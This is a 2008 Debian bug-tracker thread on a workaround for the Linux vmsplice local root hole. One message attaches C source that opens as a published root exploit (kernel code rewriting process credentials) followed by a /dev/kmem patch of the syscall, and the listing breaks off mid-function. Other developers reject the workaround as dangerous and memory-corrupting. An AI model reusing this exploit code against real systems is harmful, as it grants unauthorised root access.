Bug#464953: Amd64 hotfix

2008-02-11 Thread Kyle McMartin
On Mon, Feb 11, 2008 at 01:54:35PM -0500, Ivan Jager wrote:
 I modified the hotfix so it will also patch compat_sys_vmsplice, which 
 would be important on amd64 boxen with x86 compatibility enabled.


these hotfixes are so completely wrong, it's not even funny.
you're playing russian roulette with the return value.

   0:   b8 da ff ff ff  mov$0xffda,%eax
   5:   c3  retq   

is more correct (return -ENOSYS)

regards, kyle



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464953: Amd64 hotfix

2008-02-11 Thread Ivan Jager
I modified the hotfix so it will also patch compat_sys_vmsplice, which 
would be important on amd64 boxen with x86 compatibility enabled.


It's attached, or if for some reason it doesn't make it through, you can 
fetch it from 
http://www.andrew.cmu.edu/~aij/disable-vmsplice-if-exploitable-aij.c


Ivan/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include stdio.h
#include errno.h
#include stdlib.h
#include string.h
#include malloc.h
#include limits.h
#include signal.h
#include unistd.h
#include sys/uio.h
#include sys/mman.h
#include fcntl.h
#include asm/page.h
#define __KERNEL__
#include asm/unistd.h

#define PIPE_BUFFERS16
#define PG_compound 14
#define uintunsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)(x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

voidexit_code();
charexit_stack[1024 * 1024];

voiddie(char *msg, int err)
{
printf(err ? [-] %s: %s\n : [-] %s\n, msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
movl %0, 0x10(%%esp) ;
movl %1, 0x0c(%%esp) ;
movl %2, 0x08(%%esp) ;
movl %3, 0x04(%%esp) ;
movl %4, 0x00(%%esp) ;
iret
: : i (USER_SS), r (STACK(exit_stack)), i (USER_FL),
i (USER_CS), r (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
movl %%esp, %%eax ;
andl %1, %%eax ;
movl (%%eax), %0
: =r (curr)
: i (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
swapgs ;
movq %0, 0x20(%%rsp) ;
movq %1, 0x18(%%rsp) ;
movq %2, 0x10(%%rsp) ;
movq %3, 0x08(%%rsp) ;
movq %4, 0x00(%%rsp) ;
iretq
: : i (USER_SS), r (STACK(exit_stack)), i (USER_FL),
i (USER_CS), r (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
movq %%gs:(0), %0
: =r (curr)
);
return (void *) curr;
}

#else
#error unsupported arch
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

voidkernel_code()
{
int i;
uint*p = get_current();

for (i = 0; i  1024-13; i++) {
if (p[0] == uid  p[1] == uid 
p[2] == uid  p[3] == uid 
p[4] == gid  p[5] == gid 
p[6] == gid  p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}   

exit_kernel();
}

voidde_exploit()
{
  char line[4096];
  FILE* ksyms = fopen(/proc/kallsyms, r);
  size_t address = 0;
  size_t compat_address = 0;

  if(!ksyms)
  {
perror(Could not open /proc/kallsyms);

exit(EXIT_FAILURE);
  }

  while(fgets(line, sizeof(line), ksyms))
  {
if(strstr(line,  sys_vmsplice))
{
  sscanf(line, %zx, address);
}
if(strstr(line,  compat_sys_vmsplice))
{
  sscanf(line, %zx, compat_address);
}
  }

  if(!address)
  {
fprintf(stderr, Address not found\n);

exit(EXIT_FAILURE);
  }

  int fd = open(/dev/kmem, O_RDWR);

  if(fd == -1)
  {
perror(open(\/dev/kmem\));

exit(EXIT_FAILURE);
  }

  char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd, address 
 ~0xFFF);

  if(map == MAP_FAILED)
  {
perror(mmap);

exit(EXIT_FAILURE);
  }

  map[address  0xfff] = 0xc3; /* 0xC3 = RET */


  if (compat_address) {
printf(Patched sys_vmsplice, now patching compat_sys_vmsplice\n);
char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 
compat_address  ~0xFFF);

if(map == MAP_FAILED)
{
  perror(mmap);

  exit(EXIT_FAILURE);
}

   

Bug#464953: Amd64 hotfix

2008-02-11 Thread Michael Holzt
 I modified the hotfix so it will also patch compat_sys_vmsplice, which 
 would be important on amd64 boxen with x86 compatibility enabled.

Once again: The hotfix and also your modification are stupid, stupid,
stupid and dangerous. The hotfix first attempts to try the exploit and
this corrupts kernel memory. It is very likely that your system will
crash shortly after and numerous people have reported that the hotfix
just has that result either instantaneous or after a short while.

Also while overwriting the vmsplice syscall with a ret will prevent 
the hole from being abused, this will also confuse software which wants
to use the vmsplice call. At least one should return with a error. I'm
not sure if there is any software in normal use which uses vmsplice but
keep this in mind.

And finally: If you really really want to use this kind of fix, why
don't you just get rid of all the dangerous exploit code and only keep
the code from inside the de_exploit() function and then call this
code as root? This would do the job without causing memory corruption.

But the best fix still is to just install a updated kernel and reboot.
As said, you will anyway (but at a random time), at least when using 
this stupid hotfix which destroys your kernel memory. There might be
systems which cannot be rebooted right now, but i most cases i feel
that people who wan't to apply such a hotfix instead of deploying a
clean solution are just lazy.


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]